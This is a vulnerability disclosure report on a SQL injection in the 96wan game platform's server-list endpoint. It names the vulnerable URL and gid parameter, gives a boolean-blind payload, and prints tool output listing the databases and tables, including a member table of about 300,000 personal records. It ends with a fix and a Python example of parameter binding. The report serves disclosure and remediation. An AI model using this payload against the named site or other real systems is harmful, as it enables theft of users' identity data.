96wan game platform has a vulnerability # involves 300,000 users' information (ID card numbers # names # emails, etc.)

Injection location


#SQL injection
URL:
http://www.96wan.com/websiteapi/website_serverlist?gid=6 -- the gid parameter is attacker-controllable


Six databases exposed:
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=6 AND 1429=1429
---
back-end DBMS: MySQL 5
available databases [6]:
[*] `96wan_ucenter`
[*] `96wan_web` // main site database
[*] `96wan_wp`
[*] information_schema
[*] mysql
[*] performance_schema
#Without going deeper, just queried the main database's table info (the member table exposes about 300,000 rows of sensitive data)
Database: 96wan_web
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| `96wan_game_log`        | 4680784 |
| `96wan_login_log`       | 3916792 |
| `96wan_member_info`     | 309322  |
| `96wan_register_log`    | 308966  |
| `96wan_newcard`         | 155681  |
| `96wan_newcard2`        | 150832  |
| `96wan_channel_member`  | 93985   |
| `96wan_pay_log`         | 75946   |
| `96wan_pay_ok`          | 44113   |
| `96wan_pay_togame`      | 44113   |
| ku36_game_log           | 31458   |
| `96wan_code_log`        | 19938   |
| `96wan_lhzs_card`       | 12349   |
| ku36_member_info        | 4924    |
| `96wan_channel_info`    | 3797    |
| `96wan_area`            | 3144    |
| `96wan_verify_email`    | 1901    |
| `96wan_game_server`     | 622     |
| `96wan_forgetpwd`       | 404     |
| `96wan_channel`         | 380     |
| `96wan_city`            | 340     |
| `96wan_article`         | 311     |
| `96wan_access`          | 197     |
| `96wan_friendlink`      | 114     |
| `96wan_union_channel`   | 102     |
| `96wan_password_appeal` | 97      |
| `96wan_lhzs_usecard`    | 96      |
| `96wan_node`            | 82      |
| `96wan_test_account`    | 50      |
| `96wan_phone_code_log`  | 46      |
| `96wan_union_members`   | 40      |
| `96wan_province`        | 34      |
| `96wan_channel_source`  | 33      |
| `96wan_game`            | 25      |
| `96wan_pay_type`        | 20      |
| `96wan_slidepic`        | 19      |
| `96wan_role_user`       | 17      |
| `96wan_tg_pass`         | 16      |
| `96wan_pay_test`        | 12      |
| `96wan_notice`          | 7       |
| `96wan_singlepage`      | 7       |
| `96wan_group`           | 6       |
| `96wan_channel_ts`      | 5       |
| `96wan_role`            | 5       |
| `96wan_user`            | 4       |
| `96wan_category`        | 3       |
| `96wan_dept`            | 3       |
| `96wan_groups`          | 3       |
| `96wan_union`           | 2       |
| `96wan_card`            | 1       |
| `96wan_code`            | 1       |
| `96wan_phone_code`      | 1       |
| `96wan_sygame`          | 1       |
| `96wan_tg_paytype`      | 1       |
+-------------------------+---------+
Solution:
The parameter is attacker-controllable; developers, add input filtering.
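The remediation in one line of the report is "filter the parameter". As an added example (not code from 96wan or from the original report), the snippet below models the `website_serverlist?gid=` handler against a constructed SQLite stand-in for `96wan_game_server` with hypothetical columns, showing the string-concatenated query that lets the report's `gid=6 AND 1429=1429` payload run as SQL, beside a hardened handler that validates `gid` as a decimal integer and binds it as a query parameter.

```python
import sqlite3

# Constructed stand-in for 96wan_game_server; column names are hypothetical.
SCHEMA = """
CREATE TABLE game_server (id INTEGER PRIMARY KEY, gid INTEGER, name TEXT);
INSERT INTO game_server VALUES (1, 6, 'server-1'), (2, 6, 'server-2'),
                               (3, 7, 'server-3');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def serverlist_vulnerable(conn, gid):
    # The raw query-string value is spliced into the SQL text, so anything
    # after the number (e.g. " AND 1429=1429") is executed as SQL. This is
    # the boolean-based blind condition sqlmap reported.
    sql = "SELECT name FROM game_server WHERE gid = " + gid
    return [row[0] for row in conn.execute(sql)]


def serverlist_hardened(conn, gid):
    # 1. Validate: gid must be a plain decimal integer (no spaces, no operators).
    if not isinstance(gid, str) or not gid.isdigit():
        raise ValueError("gid must be a decimal integer")
    # 2. Bind: the value is passed as a parameter, never concatenated into SQL.
    sql = "SELECT name FROM game_server WHERE gid = ?"
    return [row[0] for row in conn.execute(sql, (int(gid),))]


def is_rejected(conn, gid):
    # Helper for regression checks: True if the hardened handler refuses gid.
    try:
        serverlist_hardened(conn, gid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(serverlist_vulnerable(db, "6 AND 1429=1429"))  # payload still returns rows
    print(is_rejected(db, "6 AND 1429=1429"))            # True after the fix
```

The validation step alone would stop this report's payload, but the parameter binding is what makes the query safe regardless of how the input check evolves.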